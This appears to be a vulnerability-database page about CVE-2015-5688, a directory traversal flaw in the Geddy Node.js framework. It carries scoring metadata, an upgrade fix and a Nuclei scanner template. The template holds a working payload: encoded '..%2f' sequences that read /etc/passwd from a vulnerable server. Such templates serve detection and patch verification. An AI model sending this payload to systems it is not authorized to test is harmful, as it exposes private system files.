Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-5688
HistoryFeb 25, 2021 - 2:34 a.m.

Geddy <13.0.8 - Local File Inclusion

2021-02-2502:34:40
ProjectDiscovery
github.com
8
geddy
lfi
directory traversal
cve-2015-5688
node.js

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.4

Confidence

Low

EPSS

0.009

Percentile

83.2%

Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a …%2f (dot dot encoded slash) in the PATH_INFO to the default URI.

id: CVE-2015-5688

info:
  name: Geddy <13.0.8 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js  that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
  impact: |
    The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
  remediation: |
    Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability.
  reference:
    - https://nodesecurity.io/advisories/geddy-directory-traversal
    - https://github.com/geddy/geddy/issues/697
    - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5688
    - https://github.com/geddy/geddy/pull/699
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-5688
    cwe-id: CWE-22
    epss-score: 0.01347
    epss-percentile: 0.86101
    cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geddyjs
    product: geddy
    framework: node.js
  tags: cve2015,cve,geddy,lfi,geddyjs,node.js

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cc89b026ca87cf13ed22d0c5f83b0877852bdffbcfced68e49ece56ac50a6c3d02210081447372c99d6593cace00c9ff9ced844310b75f90b508d792f5ab2e90785dc0:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.4

Confidence

Low

EPSS

0.009

Percentile

83.2%

Related for NUCLEI:CVE-2015-5688